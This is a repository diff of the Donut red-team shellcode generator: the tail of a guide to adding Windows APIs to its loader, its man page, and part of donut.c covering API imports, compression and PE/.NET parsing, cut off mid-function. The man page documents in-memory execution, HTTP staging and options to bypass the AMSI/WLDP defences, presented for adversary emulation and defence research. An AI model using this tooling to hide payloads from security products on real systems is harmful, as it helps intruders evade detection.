871 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
872 </pre>
873
874 <p>The function pointer for this would be declared in loader/winapi.h as:</p>
875
876 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>(</span><span style='color:#603000; '>WINAPI</span> <span style='color:#808030; '>*</span>Sleep_t<span style='color:#808030; '>)</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
877 </pre>
878
879 <h3>2. Update the API string array and function pointer array</h3>
880
881 <p>At the moment, Donut resolves API using a 64-bit hash, which is calculated by the generator before being stored in the loader itself. In donut.c is a variable called <var>api_imports</var>, declared as an array of <code>API_IMPORT</code> structures. Each entry contains a case-sensitive API string and corresponding DLL string in lowercase. The <code>Sleep</code> API is exported by kernel32.dll, so if we want the loader to use Sleep, the <code>api_imports</code> must have the following added to it. This array is terminated by an empty entry.</p>
882
883 <pre style='color:#000000;background:#ffffff;'> <span style='color:#800080; '>{</span>KERNEL32_DLL<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>Sleep</span><span style='color:#800000; '>"</span><span style='color:#800080; '>}</span><span style='color:#808030; '>,</span>
884 </pre>
885
886 <p>Of course, KERNEL32_DLL used here is a symbolic constant for "kernel32.dll".</p>
887
888 <p>The <code>DONUT_INSTANCE</code> structure is defined in include/donut.h and one of the fields called <code>api</code> is defined as a union to hold three members. <var>hash</var> is an array of <code>uint64_t</code> integers to hold a 64-bit hash of each API string. <var>addr</var> is an array of <code>void*</code> pointers to hold the address of an API in memory and finally a structure holding all the function pointers. These pointers are placed in the same order as the API strings stored in <var>api_imports</var>. Currently, the <var>api</var> member can hold up to 64 function pointers or hashes, but this can be increased if required.</p>
889
890 <p>Where you place the API string in <var>api_imports</var> is entirely up to you, but it <em>must</em> be in the same order as where the function pointer is placed in the <code>DONUT_INSTANCE</code> structure.</p>
891
892 <h3>3. Update DLL names</h3>
893
894 <p>A number of DLL are already loaded by a process; ntdll.dll, kernel32.dll and kernelbase.dll. For everything else, the instance contains a list of DLL strings loaded before attempting to resolve the address of APIs. The following list of DLLs seperated by semi-colon are loaded prior to resolving API. If the API you want Donut loader to use is exported by a DLL not shown here, you need to add it to the list.</p>
895
896 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// required for each API used by the loader</span>
897 <span style='color:#004a43; '>#</span><span style='color:#004a43; '>define</span><span style='color:#004a43; '> DLL_NAMES </span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>ole32;oleaut32;wininet;mscoree;shell32;dnsapi</span><span style='color:#800000; '>"</span>
898 </pre>
899
900 <h3>4. Calling an API</h3>
901
902 <p>If the API were successfully resolved, simply referencing the function pointer in a pointer to <code>DONUT_INSTANCE</code> is enough to invoke it. The following line of code shows how to call the <code>Sleep</code> API declared earlier.</p>
903
904 <pre style='color:#000000;background:#ffffff;'>inst<span style='color:#808030; '>-</span><span style='color:#808030; '>></span>api<span style='color:#808030; '>.</span><span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#008c00; '>1000</span><span style='color:#808030; '>*</span><span style='color:#008c00; '>5</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
905 </pre>
906
907 <p>Future plans for Donut are to provide multiple options for resolving API; Import Address Table (IAT), Export Address Table (EAT) and <a href="https://modexp.wordpress.com/2019/05/19/shellcode-getprocaddress/">Exception Directory</a> to name a few. It should also be much easier to write custom payloads using the loader.</p>
908
909 </body>
910 </html>
0 '\" t
1 .\" Title: donut
2 .\" Author: Odzhan
3 .\" Date: 12/24/2019
4 .\" Manual: Donut Reference Guide
5 .\" Source: Donut
6 .\" Language: English
7 .\"
8 .TH "DONUT" "1" "12/24/2019" "Donut v0.9.3" "Donut Reference Guide"
9 .SH NAME
10 donut \- shellcode generator
11 .SH SYNOPSIS
12 .B donut
13 [options]
14 .IR file ...
15 .SH DESCRIPTION
16 Donut, named after the dotNET framework, generates position-independent code for in-memory execution of VBScript, JScript, EXE/DLL files on the Microsoft Windows operating system. Both managed .NET assemblies and unmanaged/native EXE, DLL files are supported by the loader. There are dynamic and static libraries available for both Windows and Linux.
17 .SH MODULE OPTIONS
18 .TP
19 .BR \-n " " <name>
20 Module name for HTTP staging. If entropy is enabled, this is generated randomly.
21 .TP
22 .BR \-s " " <server>
23 URL for the HTTP server that will host a Donut module.
24 .TP
25 .BR \-e " " <level>
26 Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default).
27 .SH PIC/SHELLCODE OPTIONS
28 .TP
29 .BR \-a " " <arch>
30 Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).
31 .TP
32 .BR \-b " " <level>
33 Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default).
34 .TP
35 .BR \-o " " <path>
36 Output file to save loader. Default is "loader.bin".
37 .TP
38 .BR \-f " " <format>
39 Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal.
40 .TP
41 .BR \-y " " <addr>
42 Create a new thread for loader and continue execution at address supplied. \fIaddr\fR must be in hexadecimal format.
43 .TP
44 .BR \-x " " <action>
45 Determines how the loader should exit. 1=exit thread (default), 2=exit process.
46 .SH FILE OPTIONS
47 .TP
48 .BR \-c " " <namespace.class>
49 Optional class name. (required for .NET DLL)
50 .TP
51 .BR \-d " " <name>
52 AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
53 .TP
54 .BR \-m " " <method | api>
55 Optional method or function for DLL. (a method is required for .NET DLL)
56 .TP
57 .BR \-p " " <arguments>
58 Optional arguments/command line inside quotations for DLL method/function or EXE.
59 .TP
60 .BR \-w
61 Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
62 .TP
63 .BR \-r " " <version>
64 CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
65 .TP
66 .BR \-t
67 Run the entrypoint of an unmanaged/native EXE as a thread and wait for thread to end.
68 .TP
69 .BR \-z " " <engine>
70 Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress.
71 Compression engines 3 abd 4 are only available on Windows.
72 .SH AUTHORS
73 Odzhan, TheWover
74 .SH DISCLAIMER
75 The authors are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.
76 .SH COPYRIGHT
77 BSD 3-Clause License
78
79 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
80
81 Redistribution and use in source and binary forms, with or without
82 modification, are permitted provided that the following conditions are met:
83
84 * Redistributions of source code must retain the above copyright notice, this
85 list of conditions and the following disclaimer.
86
87 * Redistributions in binary form must reproduce the above copyright notice,
88 this list of conditions and the following disclaimer in the documentation
89 and/or other materials provided with the distribution.
90
91 * Neither the name of the copyright holder nor the names of its
92 contributors may be used to endorse or promote products derived from
93 this software without specific prior written permission.
94
95 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
96 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
97 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
98 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
99 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
100 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
101 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
102 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
103 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
104 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
105 .SH "NOTES"
106 .IP " 1." 4
107 Loading .NET Assemblies From Memory.
108 .RS 4
109 \%https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
110 .RE
111 .IP " 2." 4
112 Donut - Injecting .NET Assemblies as Shellcode
113 .RS 4
114 \%https://thewover.github.io/Introducing-Donut/
115 .RE
116 .IP " 3." 4
117 How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code
118 .RS 4
119 \%https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/
120 .RE
121 .IP " 4." 4
122 In-Memory Execution of DLL
123 .RS 4
124 \%https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/
125 .RE
126 .IP " 5." 4
127 Data Compression
128 .RS 4
129 \%https://modexp.wordpress.com/2019/12/08/shellcode-compression/
130 .RE
+1703
-745
donut.c
00 /**
11 BSD 3-Clause License
22
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
3 Copyright (c) 2019-2020, TheWover, Odzhan. All rights reserved.
44
55 Redistribution and use in source and binary forms, with or without
66 modification, are permitted provided that the following conditions are met:
3030
3131 #include "donut.h"
3232
33 #include "payload/payload_exe_x86.h"
34 #include "payload/payload_exe_x64.h"
33 #include "loader_exe_x86.h"
34 #include "loader_exe_x64.h"
3535
3636 #define PUT_BYTE(p, v) { *(uint8_t *)(p) = (uint8_t) (v); p = (uint8_t*)p + 1; }
3737 #define PUT_HWORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 2); p = (uint8_t*)p + 2; }
3838 #define PUT_WORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 4); p = (uint8_t*)p + 4; }
3939 #define PUT_BYTES(p, v, n) { memcpy(p, v, n); p = (uint8_t*)p + n; }
4040
41 // these have to be in same order as DONUT_INSTANCE structure in donut.h
42 static API_IMPORT api_imports[]=
43 {
41 // required for each API used by the loader
42 #define DLL_NAMES "ole32;oleaut32;wininet;mscoree;shell32"
43
44 // These must be in the same order as the DONUT_INSTANCE structure defined in donut.h
45 static API_IMPORT api_imports[] = {
4446 {KERNEL32_DLL, "LoadLibraryA"},
4547 {KERNEL32_DLL, "GetProcAddress"},
4648 {KERNEL32_DLL, "GetModuleHandleA"},
4749 {KERNEL32_DLL, "VirtualAlloc"},
4850 {KERNEL32_DLL, "VirtualFree"},
49 {KERNEL32_DLL, "VirtualQuery"},
50 {KERNEL32_DLL, "VirtualProtect"},
5151 {KERNEL32_DLL, "Sleep"},
5252 {KERNEL32_DLL, "MultiByteToWideChar"},
5353 {KERNEL32_DLL, "GetUserDefaultLCID"},
54
54 {KERNEL32_DLL, "CreateThread"},
55 {KERNEL32_DLL, "CreateFileA"},
56 {KERNEL32_DLL, "GetThreadContext"},
57 {KERNEL32_DLL, "GetCurrentThread"},
58 {KERNEL32_DLL, "GetCurrentProcess"},
59 {KERNEL32_DLL, "GetCommandLineA"},
60 {KERNEL32_DLL, "GetCommandLineW"},
61 {KERNEL32_DLL, "HeapAlloc"},
62 {KERNEL32_DLL, "HeapReAlloc"},
63 {KERNEL32_DLL, "GetProcessHeap"},
64 {KERNEL32_DLL, "HeapFree"},
65 {KERNEL32_DLL, "GetLastError"},
66
67 {SHELL32_DLL, "CommandLineToArgvW"},
68
5569 {OLEAUT32_DLL, "SafeArrayCreate"},
5670 {OLEAUT32_DLL, "SafeArrayCreateVector"},
5771 {OLEAUT32_DLL, "SafeArrayPutElement"},
6781 {WININET_DLL, "InternetConnectA"},
6882 {WININET_DLL, "InternetSetOptionA"},
6983 {WININET_DLL, "InternetReadFile"},
84 {WININET_DLL, "InternetQueryDataAvailable"},
7085 {WININET_DLL, "InternetCloseHandle"},
7186 {WININET_DLL, "HttpOpenRequestA"},
7287 {WININET_DLL, "HttpSendRequestA"},
7994 {OLE32_DLL, "CoCreateInstance"},
8095 {OLE32_DLL, "CoUninitialize"},
8196
82 { NULL, NULL }
97 {NTDLL_DLL, "RtlEqualUnicodeString"},
98 {NTDLL_DLL, "RtlEqualString"},
99 {NTDLL_DLL, "RtlUnicodeStringToAnsiString"},
100 {NTDLL_DLL, "RtlInitUnicodeString"},
101 {NTDLL_DLL, "RtlExitUserThread"},
102 {NTDLL_DLL, "RtlExitUserProcess"},
103 {NTDLL_DLL, "RtlCreateUnicodeString"},
104 {NTDLL_DLL, "RtlGetCompressionWorkSpaceSize"},
105 {NTDLL_DLL, "RtlDecompressBuffer"},
106 {NTDLL_DLL, "NtContinue"},
107 {KERNEL32_DLL, "AddVectoredExceptionHandler"},
108 {KERNEL32_DLL, "RemoveVectoredExceptionHandler"},
109
110 { NULL, NULL } // last one always contains two NULL pointers
83111 };
84112
85113 // required to load .NET assemblies
116144
117145 static GUID xIID_IActiveScriptSite = {
118146 0xdb01a1e3, 0xa42b, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
147
148 static GUID xIID_IActiveScriptSiteWindow = {
149 0xd10f6761, 0x83e9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
119150
120151 static GUID xIID_IActiveScriptParse32 = {
121152 0xbb1a2ae2, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
129160 static GUID xCLSID_JScript = {
130161 0xF414C260, 0x6AC0, 0x11CF, {0xB6, 0xD1, 0x00, 0xAA, 0x00, 0xBB, 0xBB, 0x58}};
131162
132 // required to load XSL files
133 static GUID xCLSID_DOMDocument30 = {
134 0xf5078f32, 0xc551, 0x11d3, {0x89, 0xb9, 0x00, 0x00, 0xf8, 0x1f, 0xe2, 0x21}};
135
136 static GUID xIID_IXMLDOMDocument = {
137 0x2933BF81, 0x7B36, 0x11D2, {0xB2, 0x0E, 0x00, 0xC0, 0x4F, 0x98, 0x3E, 0x60}};
138
139 static GUID xIID_IXMLDOMNode = {
140 0x2933bf80, 0x7b36, 0x11d2, {0xb2, 0x0e, 0x00, 0xc0, 0x4f, 0x98, 0x3e, 0x60}};
141
142 #if defined(_WIN32) | defined(_WIN64)
143 #include "include/mmap-windows.c"
144 #ifdef _MSC_VER
145 #define strcasecmp stricmp
146 #endif
147 #endif
163 // where to store information about input file
164 file_info fi;
148165
149166 // return pointer to DOS header
150167 static PIMAGE_DOS_HEADER DosHdr(void *map) {
192209 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
193210 }
194211
195 static ULONG64 rva2ofs (void *base, DWORD rva) {
212 static ULONG64 rva2ofs (void *base, ULONG64 rva) {
196213 DWORD i;
197214 ULONG64 ofs;
198215 PIMAGE_DOS_HEADER dos;
201218
202219 dos = (PIMAGE_DOS_HEADER)base;
203220 nt = (PIMAGE_NT_HEADERS)((PBYTE)base + dos->e_lfanew);
204 sh = IMAGE_FIRST_SECTION(nt);
205
206 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
207 if (rva >= sh[i].VirtualAddress &&
208 rva < sh[i].VirtualAddress + sh[i].SizeOfRawData) {
221 sh = (PIMAGE_SECTION_HEADER)
222 ((PBYTE)&nt->OptionalHeader + nt->FileHeader.SizeOfOptionalHeader);
223
224 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
225 if ((rva >= sh[i].VirtualAddress) &&
226 (rva < (sh[i].VirtualAddress + sh[i].SizeOfRawData))) {
209227
210228 ofs = sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
211229 return ofs;
214232 return -1;
215233 }
216234
217 // map a file into memory for reading
218 static int map_file(const char *path, file_info *fi) {
235 #ifdef WINDOWS
236 #include "mmap-windows.c"
237 #endif
238
239 /**
240 * Function: map_file
241 * ----------------------------
242 * Open and map the contents of file into memory.
243 *
244 * INPUT : path = file to map
245 *
246 * OUTPUT : Donut error code.
247 */
248 static int map_file(const char *path) {
219249 struct stat fs;
220250
221 DPRINT("Reading size of file : %s", path);
251 DPRINT("Entering.");
252
222253 if(stat(path, &fs) != 0) {
254 DPRINT("Unable to read size of file : %s", path);
223255 return DONUT_ERROR_FILE_NOT_FOUND;
224256 }
225257
226258 if(fs.st_size == 0) {
259 DPRINT("File appears to be empty!");
227260 return DONUT_ERROR_FILE_EMPTY;
228261 }
229
230 DPRINT("Opening %s", path);
231 fi->fd = open(path, O_RDONLY);
232
233 if(fi->fd < 0) {
262
263 fi.fd = open(path, O_RDONLY);
264
265 if(fi.fd < 0) {
266 DPRINT("Unable to open %s for reading.", path);
234267 return DONUT_ERROR_FILE_ACCESS;
235268 }
236269
237 fi->size = fs.st_size;
238
239 // map into memory
240 DPRINT("Mapping %" PRIi64 " bytes for %s", fi->size, path);
241 fi->map = mmap(NULL, fi->size,
242 PROT_READ, MAP_PRIVATE, fi->fd, 0);
270 fi.len = fs.st_size;
271
272 fi.data = mmap(NULL, fi.len, PROT_READ, MAP_PRIVATE, fi.fd, 0);
243273
244274 // no mapping? close file
245 if(fi->map == NULL) {
246 close(fi->fd);
247 fi->map = NULL;
275 if(fi.data == NULL) {
276 DPRINT("Unable to map file : %s", path);
277 close(fi.fd);
248278 return DONUT_ERROR_NO_MEMORY;
249279 }
250 return DONUT_ERROR_SUCCESS;
251 }
252
253 // unmap a file from memory previously opened with map_file()
254 static int unmap_file(file_info *fi) {
255
256 if(fi == NULL) return 0;
257
258 DPRINT("Unmapping");
259 munmap(fi->map, fi->size);
260
261 DPRINT("Closing");
262 close(fi->fd);
263
264 return 1;
265 }
266
267 static int get_file_info(const char *path, file_info *fi) {
268 PIMAGE_NT_HEADERS nt;
269 PIMAGE_DATA_DIRECTORY dir;
270 PMDSTORAGESIGNATURE pss;
271 PIMAGE_COR20_HEADER cor;
272 DWORD dll, rva, ofs, cpu;
273 PCHAR ext;
274 int err = DONUT_ERROR_SUCCESS;
275
280 return DONUT_ERROR_OK;
281 }
282
283 /**
284 * Function: unmap_file
285 * ----------------------------
286 * Releases memory allocated for file and closes descriptor.
287 *
288 * INPUT : Nothing
289 *
290 * OUTPUT : Donut error code
291 */
292 static int unmap_file(void) {
293
294 if(fi.zdata != NULL) {
295 DPRINT("Releasing compressed data.");
296 free(fi.zdata);
297 fi.zdata = NULL;
298 }
299 if(fi.data != NULL) {
300 DPRINT("Unmapping input file.");
301 munmap(fi.data, fi.len);
302 fi.data = NULL;
303 }
304 if(fi.fd != 0) {
305 DPRINT("Closing input file.");
306 close(fi.fd);
307 fi.fd = 0;
308 }
309 return DONUT_ERROR_OK;
310 }
311
312 // only included for executable generator or debug build
313 #if defined(DONUT_EXE) || defined(DEBUG)
314 /**
315 * Function: file_diff
316 * ----------------------------
317 * Calculates the ratio between two lengths for compression and decompression.
318 *
319 * INPUT : new_len = new length
320 * : old_len = old length
321 *
322 * OUTPUT : ratio as a percentage
323 */
324 static uint32_t file_diff(uint32_t new_len, uint32_t old_len) {
325 if (new_len <= UINT_MAX / 100) {
326 new_len *= 100;
327 } else {
328 old_len /= 100;
329 }
330 if (old_len == 0) {
331 old_len = 1;
332 }
333 return (100 - (new_len / old_len));
334 }
335 #endif
336
337 /**
338 * Function: compress_file
339 * ----------------------------
340 * Compresses the input file based on engine selected by user
341 *
342 * INPUT : Pointer to Donut configuration.
343 *
344 * OUTPUT : Donut error code.
345 */
346 int compress_file(PDONUT_CONFIG c) {
347 int err = DONUT_ERROR_OK;
348
349 // RtlCompressBuffer is only available on Windows
350 #ifdef WINDOWS
351 typedef NTSTATUS (WINAPI *RtlGetCompressionWorkSpaceSize_t)(
352 USHORT CompressionFormatAndEngine,
353 PULONG CompressBufferWorkSpaceSize,
354 PULONG CompressFragmentWorkSpaceSize);
355
356 typedef NTSTATUS (WINAPI *RtlCompressBuffer_t)(
357 USHORT CompressionFormatAndEngine,
358 PUCHAR UncompressedBuffer,
359 ULONG UncompressedBufferSize,
360 PUCHAR CompressedBuffer,
361 ULONG CompressedBufferSize,
362 ULONG UncompressedChunkSize,
363 PULONG FinalCompressedSize,
364 PVOID WorkSpace);
365
366 ULONG wspace, fspace;
367 NTSTATUS nts;
368 PVOID ws;
369 HMODULE m;
370 RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
371 RtlCompressBuffer_t RtlCompressBuffer;
372
373 // compress file using RtlCompressBuffer?
374 if(c->compress == DONUT_COMPRESS_LZNT1 ||
375 c->compress == DONUT_COMPRESS_XPRESS)
376 {
377 m = GetModuleHandle("ntdll");
378 RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
379 RtlCompressBuffer = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
380
381 if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
382 DPRINT("Unable to resolve compression API");
383 return DONUT_ERROR_COMPRESSION;
384 }
385
386 DPRINT("Reading fragment and workspace size");
387 nts = RtlGetCompressionWorkSpaceSize(
388 (c->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
389 &wspace, &fspace);
390
391 if(nts == 0) {
392 DPRINT("workspace size : %"PRId32" | fragment size : %"PRId32, wspace, fspace);
393 ws = malloc(wspace);
394 if(ws != NULL) {
395 DPRINT("Allocating memory for compressed data.");
396 fi.zdata = malloc(fi.len);
397 if(fi.zdata != NULL) {
398 DPRINT("Compressing %p to %p with RtlCompressBuffer(%s)",
399 fi.data, fi.zdata,
400 c->compress == DONUT_COMPRESS_LZNT1 ? "LZNT" : "XPRESS");
401
402 nts = RtlCompressBuffer(
403 (c->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
404 fi.data, fi.len, fi.zdata, fi.len, 0,
405 (PULONG)&fi.zlen, ws);
406
407 if(nts != 0) {
408 DPRINT("NTSTATUS : %lx", nts);
409 err = DONUT_ERROR_COMPRESSION;
410 }
411 } else err = DONUT_ERROR_NO_MEMORY;
412 free(ws);
413 } else err = DONUT_ERROR_NO_MEMORY;
414 } else err = DONUT_ERROR_COMPRESSION;
415 }
416 #endif
417 if(c->compress == DONUT_COMPRESS_APLIB) {
418 DPRINT("Obtaining size of compressed data from aP_max_packed_size() and allocating memory");
419 fi.zdata = malloc(aP_max_packed_size(fi.len));
420 if(fi.zdata != NULL) {
421 DPRINT("Obtaining size of work memory from aP_workmem_size() and allocating memory");
422 uint8_t *workmem = malloc(aP_workmem_size(fi.len));
423 if(workmem != NULL) {
424 DPRINT("Compressing with aP_pack()");
425 fi.zlen = aP_pack(fi.data, fi.zdata, fi.len, workmem, NULL, NULL);
426
427 if(fi.zlen == APLIB_ERROR) err = DONUT_ERROR_COMPRESSION;
428 free(workmem);
429 } else err = DONUT_ERROR_NO_MEMORY;
430 } else err = DONUT_ERROR_NO_MEMORY;
431 }
432
433 // if compression is specified
434 if(err == DONUT_ERROR_OK && c->compress != DONUT_COMPRESS_NONE) {
435 // set the compressed length in configuration
436 c->zlen = fi.zlen;
437 DPRINT("Original file size : %"PRId32 " | Compressed : %"PRId32, fi.len, fi.zlen);
438 DPRINT("File size reduced by %"PRId32"%%", file_diff(fi.zlen, fi.len));
439 }
440 DPRINT("Leaving with error : %" PRId32, err);
441 return err;
442 }
443
444 /**
445 * Function: read_file_info
446 * ----------------------------
447 * Reads information about the input file.
448 *
449 * INPUT : Pointer to Donut configuration.
450 *
451 * OUTPUT : Donut error code.
452 */
453 static int read_file_info(PDONUT_CONFIG c) {
454 PIMAGE_NT_HEADERS nt;
455 PIMAGE_DATA_DIRECTORY dir;
456 PMDSTORAGESIGNATURE pss;
457 PIMAGE_COR20_HEADER cor;
458 DWORD dll, rva, cpu;
459 ULONG64 ofs;
460 PCHAR ext;
461 int err = DONUT_ERROR_OK;
462
276463 DPRINT("Entering.");
277464
278465 // invalid parameters passed?
279 if(path == NULL || fi == NULL) {
466 if(c->input[0] == 0) {
467 DPRINT("No input file provided.");
280468 return DONUT_ERROR_INVALID_PARAMETER;
281469 }
282 // zero initialize file_info structure
283 memset(fi, 0, sizeof(file_info));
284
285 DPRINT("Checking extension of %s", path);
286 ext = strrchr(path, '.');
470
471 DPRINT("Checking extension of %s", c->input);
472 ext = strrchr(c->input, '.');
287473
288474 // no extension? exit
289475 if(ext == NULL) {
476 DPRINT("Input file has no extension.");
290477 return DONUT_ERROR_FILE_INVALID;
291478 }
292479 DPRINT("Extension is \"%s\"", ext);
293480
294481 // VBScript?
295482 if (strcasecmp(ext, ".vbs") == 0) {
296 DPRINT("Module is VBS");
297 fi->type = DONUT_MODULE_VBS;
298 fi->arch = DONUT_ARCH_ANY;
483 DPRINT("File is VBS");
484 fi.type = DONUT_MODULE_VBS;
485 fi.arch = DONUT_ARCH_ANY;
299486 } else
300487 // JScript?
301488 if (strcasecmp(ext, ".js") == 0) {
302 DPRINT("Module is JS");
303 fi->type = DONUT_MODULE_JS;
304 fi->arch = DONUT_ARCH_ANY;
489 DPRINT("File is JS");
490 fi.type = DONUT_MODULE_JS;
491 fi.arch = DONUT_ARCH_ANY;
305492 } else
306 // XSL?
307 if (strcasecmp(ext, ".xsl") == 0) {
308 DPRINT("Module is XSL");
309 fi->type = DONUT_MODULE_XSL;
310 fi->arch = DONUT_ARCH_ANY;
311 } else
312493 // EXE?
313494 if (strcasecmp(ext, ".exe") == 0) {
314 DPRINT("Module is EXE");
315 fi->type = DONUT_MODULE_EXE;
495 DPRINT("File is EXE");
496 fi.type = DONUT_MODULE_EXE;
316497 } else
317498 // DLL?
318499 if (strcasecmp(ext, ".dll") == 0) {
319 DPRINT("Module is DLL");
320 fi->type = DONUT_MODULE_DLL;
500 DPRINT("File is DLL");
501 fi.type = DONUT_MODULE_DLL;
321502 } else {
322 // unrecognized extension
503 DPRINT("Don't recognize file extension.");
323504 return DONUT_ERROR_FILE_INVALID;
324505 }
325506
326 DPRINT("Mapping %s into memory", path);
327
328 err = map_file(path, fi);
329 if(err != DONUT_ERROR_SUCCESS) return err;
507 DPRINT("Mapping %s into memory", c->input);
508
509 err = map_file(c->input);
510 if(err != DONUT_ERROR_OK) return err;
330511
331512 // file is EXE or DLL?
332 if(fi->type == DONUT_MODULE_DLL ||
333 fi->type == DONUT_MODULE_EXE)
513 if(fi.type == DONUT_MODULE_DLL ||
514 fi.type == DONUT_MODULE_EXE)
334515 {
335 DPRINT("Checking DOS header");
336
337 if(!valid_dos_hdr(fi->map)) {
516 if(!valid_dos_hdr(fi.data)) {
517 DPRINT("EXE/DLL has no valid DOS header.");
338518 err = DONUT_ERROR_FILE_INVALID;
339519 goto cleanup;
340520 }
341 DPRINT("Checking NT header");
342
343 if(!valid_nt_hdr(fi->map)) {
521
522 if(!valid_nt_hdr(fi.data)) {
523 DPRINT("EXE/DLL has no valid NT header.");
344524 err = DONUT_ERROR_FILE_INVALID;
345525 goto cleanup;
346526 }
347 DPRINT("Checking IMAGE_DATA_DIRECTORY");
348
349 dir = Dirs(fi->map);
527
528 dir = Dirs(fi.data);
350529
351530 if(dir == NULL) {
531 DPRINT("EXE/DLL has no valid image directories.");
352532 err = DONUT_ERROR_FILE_INVALID;
353533 goto cleanup;
354534 }
355535 DPRINT("Checking characteristics");
356536
357 nt = NtHdr(fi->map);
537 nt = NtHdr(fi.data);
358538 dll = nt->FileHeader.Characteristics & IMAGE_FILE_DLL;
359 cpu = is32(fi->map);
539 cpu = is32(fi.data);
360540 rva = dir[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress;
361541
362542 // set the CPU architecture for file
363 fi->arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
543 fi.arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
364544
365545 // if COM directory present
366546 if(rva != 0) {
367 DPRINT("COM Directory found");
547 DPRINT("COM Directory found indicates .NET assembly.");
368548
369 // set type to EXE or DLL assembly
370 fi->type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
371
372 // try read the runtime version from meta header
373 strncpy(fi->ver, "v4.0.30319", DONUT_VER_LEN - 1);
374
375 ofs = rva2ofs(fi->map, rva);
376 if (ofs != -1) {
377 cor = (PIMAGE_COR20_HEADER)(ofs + fi->map);
378 rva = cor->MetaData.VirtualAddress;
379 if(rva != 0) {
380 ofs = rva2ofs(fi->map, rva);
381 if(ofs != -1) {
382 pss = (PMDSTORAGESIGNATURE)(ofs + fi->map);
383 DPRINT("Runtime version : %s", (char*)pss->pVersion);
384 strncpy(fi->ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
549 // if it has an export address table, we assume it's a .NET
550 // mixed assembly. curently unsupported by the PE loader.
551 if(dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress != 0) {
552 DPRINT("File looks like a mixed (native and managed) assembly.");
553 err = DONUT_ERROR_MIXED_ASSEMBLY;
554 goto cleanup;
555 } else {
556 // set type to EXE or DLL assembly
557 fi.type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
558
559 // try read the runtime version from meta header
560 strncpy(fi.ver, "v4.0.30319", DONUT_VER_LEN - 1);
561
562 ofs = rva2ofs(fi.data, rva);
563 if (ofs != -1) {
